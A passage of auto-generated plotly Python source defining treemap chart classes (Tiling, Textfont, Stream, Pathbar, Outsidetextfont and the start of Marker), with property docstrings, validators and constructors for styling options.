The 'squarifyratio' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["squarifyratio"]
@squarifyratio.setter
def squarifyratio(self, val):
self["squarifyratio"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
"""
def __init__(
self, arg=None, flip=None, packing=None, pad=None, squarifyratio=None, **kwargs
):
"""
Construct a new Tiling object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Tiling
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
Returns
-------
Tiling
"""
super(Tiling, self).__init__("tiling")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Tiling
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Tiling"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import tiling as v_tiling
# Initialize validators
# ---------------------
self._validators["flip"] = v_tiling.FlipValidator()
self._validators["packing"] = v_tiling.PackingValidator()
self._validators["pad"] = v_tiling.PadValidator()
self._validators["squarifyratio"] = v_tiling.SquarifyratioValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("flip", None)
self["flip"] = flip if flip is not None else _v
_v = arg.pop("packing", None)
self["packing"] = packing if packing is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("squarifyratio", None)
self["squarifyratio"] = squarifyratio if squarifyratio is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Textfont object
Sets the font used for `textinfo`.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Textfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Textfont
"""
super(Textfont, self).__init__("textfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Textfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Textfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import textfont as v_textfont
# Initialize validators
# ---------------------
self._validators["color"] = v_textfont.ColorValidator()
self._validators["colorsrc"] = v_textfont.ColorsrcValidator()
self._validators["family"] = v_textfont.FamilyValidator()
self._validators["familysrc"] = v_textfont.FamilysrcValidator()
self._validators["size"] = v_textfont.SizeValidator()
self._validators["sizesrc"] = v_textfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
# maxpoints
# ---------
@property
def maxpoints(self):
"""
Sets the maximum number of points to keep on the plots from an
incoming stream. If `maxpoints` is set to 50, only the newest
50 points will be displayed on the plot.
The 'maxpoints' property is a number and may be specified as:
- An int or float in the interval [0, 10000]
Returns
-------
int|float
"""
return self["maxpoints"]
@maxpoints.setter
def maxpoints(self, val):
self["maxpoints"] = val
# token
# -----
@property
def token(self):
"""
The stream id number links a data trace on a plot with a
stream. See https://plot.ly/settings for more details.
The 'token' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["token"]
@token.setter
def token(self, val):
self["token"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
"""
def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
"""
Construct a new Stream object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Stream
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
Returns
-------
Stream
"""
super(Stream, self).__init__("stream")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Stream
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Stream"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import stream as v_stream
# Initialize validators
# ---------------------
self._validators["maxpoints"] = v_stream.MaxpointsValidator()
self._validators["token"] = v_stream.TokenValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("maxpoints", None)
self["maxpoints"] = maxpoints if maxpoints is not None else _v
_v = arg.pop("token", None)
self["token"] = token if token is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Pathbar(_BaseTraceHierarchyType):
# edgeshape
# ---------
@property
def edgeshape(self):
"""
Determines which shape is used for edges between `barpath`
labels.
The 'edgeshape' property is an enumeration that may be specified as:
- One of the following enumeration values:
['>', '<', '|', '\\']
- A string that matches one of the following regular expressions:
['']
Returns
-------
Any
"""
return self["edgeshape"]
@edgeshape.setter
def edgeshape(self, val):
self["edgeshape"] = val
# side
# ----
@property
def side(self):
"""
Determines on which side of the the treemap the `pathbar`
should be presented.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# textfont
# --------
@property
def textfont(self):
"""
Sets the font used inside `pathbar`.
The 'textfont' property is an instance of Textfont
that may be specified as:
- An instance of plotly.graph_objs.treemap.pathbar.Textfont
- A dict of string/value properties that will be passed
to the Textfont constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.pathbar.Textfont
"""
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of `pathbar` (in px). If not specified the
`pathbar.textfont.size` is used with 3 pixles extra padding on
each side.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [12, inf]
Returns
-------
int|float
"""
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# visible
# -------
@property
def visible(self):
"""
Determines if the path bar is drawn i.e. outside the trace
`domain` and with one pixel gap.
The 'visible' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
edgeshape
Determines which shape is used for edges between
`barpath` labels.
side
Determines on which side of the the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified the `pathbar.textfont.size` is used with 3
pixles extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
"""
def __init__(
self,
arg=None,
edgeshape=None,
side=None,
textfont=None,
thickness=None,
visible=None,
**kwargs
):
"""
Construct a new Pathbar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Pathbar
edgeshape
Determines which shape is used for edges between
`barpath` labels.
side
Determines on which side of the the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified the `pathbar.textfont.size` is used with 3
pixles extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
Returns
-------
Pathbar
"""
super(Pathbar, self).__init__("pathbar")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Pathbar
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Pathbar"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import pathbar as v_pathbar
# Initialize validators
# ---------------------
self._validators["edgeshape"] = v_pathbar.EdgeshapeValidator()
self._validators["side"] = v_pathbar.SideValidator()
self._validators["textfont"] = v_pathbar.TextfontValidator()
self._validators["thickness"] = v_pathbar.ThicknessValidator()
self._validators["visible"] = v_pathbar.VisibleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("edgeshape", None)
self["edgeshape"] = edgeshape if edgeshape is not None else _v
_v = arg.pop("side", None)
self["side"] = side if side is not None else _v
_v = arg.pop("textfont", None)
self["textfont"] = textfont if textfont is not None else _v
_v = arg.pop("thickness", None)
self["thickness"] = thickness if thickness is not None else _v
_v = arg.pop("visible", None)
self["visible"] = visible if visible is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Outsidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Outsidetextfont object
Sets the font used for `textinfo` lying outside the sector.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly.graph_objs.treemap.Outsidetextfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Outsidetextfont
"""
super(Outsidetextfont, self).__init__("outsidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Outsidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Outsidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import outsidetextfont as v_outsidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_outsidetextfont.ColorValidator()
self._validators["colorsrc"] = v_outsidetextfont.ColorsrcValidator()
self._validators["family"] = v_outsidetextfont.FamilyValidator()
self._validators["familysrc"] = v_outsidetextfont.FamilysrcValidator()
self._validators["size"] = v_outsidetextfont.SizeValidator()
self._validators["sizesrc"] = v_outsidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Marker(_BaseTraceHierarchyType):
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set to a
numerical array. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be chosen
according to whether numbers in the `color` array are all
positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here colors) or the bounds set in
`marker.cmin` and `marker.cmax` Has an effect only if colorsis
set to a numerical array. Defaults to `false` when
`marker.cmin` and `marker.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
Sets the upper bound of the color domain. Has an effect only if
colorsis set to a numerical array. Value should have the same
units as colors and if set, `marker.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling `marker.cmin`
and/or `marker.cmax` to be equidistant to this point. Has an
effect only if colorsis set to a numerical array. Value should
have the same units as colors. Has no effect when
`marker.cauto` is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
Sets the lower bound of the color domain. Has an effect only if
colorsis set to a numerical array. Value should have the same
units as colors and if set, `marker.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorbar
# --------
@property
def colorbar(self):
"""
The 'colorbar' property is an instance of ColorBar
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.ColorBar
- A dict of string/value properties that will be passed
to the ColorBar constructor
Supported dict properties:
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing
this color bar.
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure
excludes the padding of both ends. That is, the
color bar length is this length minus the
padding on both ends.
lenmode
Determines whether this color bar's length
(i.e. the measure in the color variation
direction) is set in units of plot "fraction"
or in *pixels. Use `len` to set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
